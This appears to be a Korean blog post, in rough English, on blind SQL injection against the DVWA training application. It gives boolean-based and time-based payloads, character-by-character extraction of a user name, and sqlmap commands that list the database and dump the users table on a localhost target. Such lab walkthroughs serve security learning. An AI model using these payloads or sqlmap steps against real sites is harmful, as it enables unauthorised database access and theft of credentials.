SQL Injection (Blind)
If the web page where you want to attack doesn't print any errors and query result list, the attack from this pattern is hard to succeed. Because it doesn't provide query result data, we cannot confirm the data through attacks like a UNION query.
In this case, Blind SQL Injection can usefully be used. In other words, the attack is an attack method that spills out a database value from true/false query results.
1) Boolean-based Blind Attack
If some website provides a board search function, we can test true/false like this.
(TRUE)
<input>
스터디’ AND 1=1—
<result>
게시판 검색됨 ( true )
(FALSE)
<input>
스터디’ AND 1=2—
<result>
게시판 검색 안됨 (false)
If this attempt is executed in the webpage, information leakage is possible from the result by inserting query condition that hacker want to know through AND condition is a Blind SQL Injection.
2) Time-based Blind Attack
In some cases, because the response results are always the same, there may be cases where it is impossible to determine true/false based on the response result alone.
This case can be identified as true/false from the response time difference by inserting a query delaying time.
(MS SQL Server environment)
[input]
스터디’ IF SYSTEM_USER=‘admin’ WAITFOR DELAY ‘00:00:5’--
[result]
Select * from Boards where title=‘스터디’ if system_user=‘admin’ wait for delay ’00:00:5’ --1) True: 응답이 5초 지연 ( system account: admin )
2) False: 즉시 응답 ( X )
(My SQL environment)
[input]
스터디 and sleep(5) #’
[result]
SELECT * FROM Boards WHERE title= ‘스터디’ AND sleep(5)1) True: 응답이 5초 지연 ( the search word exists )
2) False: 즉시 응답 ( X )
In summary, Blind SQL Injection is an attack method that can gain the data only to server response of the query result is true/false. This attack can gain important information by comparing many conditions. In almost any case, the attack proceeds using an automated tool.
<Attack Scenario> [password attack]
( ‘Z’ : ASCII 90 )
<소문자 확인>
스터디’ AND ASCII(LEFT((SELECT PASSWORD FROM [USERS] WHERE UserID=‘admin’),1)) > 90
We can attack like this.
<Low>
<Boolean-based>
<Time-based>
<input>
1’and ascii(substr((select first_name from users where user_id=‘1’),1,1)) > 91#
1’ and ascii(substr((select first_name from users where user_id=‘1’),1,1)) > 96#
1’ and ascii(substr((select first_name from users where user_id=‘1’),1,1)) > 97#
This result gives the information about the ID of the user to me.
ASCII: 97 (first character) -> ‘a’
<input>
1' and ascii(substr((select first_name from users where user_id='1'),2,1)) > 99#
1' and ascii(substr((select first_name from users where user_id='1'),2,1)) > 100#
ASCII: 100 (second character) -> ‘d’
Total ID: admin
<Blind SQL Injection using Tool>
Download Site: http://sqlmap.org
Move to the downloaded directory
-> python sqlmap.py -u “Attack Target URL” --cookie=“site cookie value”
<Method to get the cookie value>
After moving to the console window, enter the content like this.
If you enter the content, the cookie value is printed on the console window.
<Run>
python sqlmap.py -u “http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit” --cookie= “YOUR COOKIE”
We can know what attack is possible through information like this and what server the system is based on.
<Method to get the current DB name>
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="YOUR COOKIE" --current-db
Current database: dvwa
<Method to get the table name>
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="YOUR COOKIE" -D dvwa --tables
<Method to get the data that is stored in the tables>
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="YOUR COOKIE" -T users –dump
It just is a test. But if it is a reality, it is a very dangerous situation.
'Web Security > DVWA' 카테고리의 다른 글
| [DVWA] Command Injection (0) | 2021.06.24 |
|---|
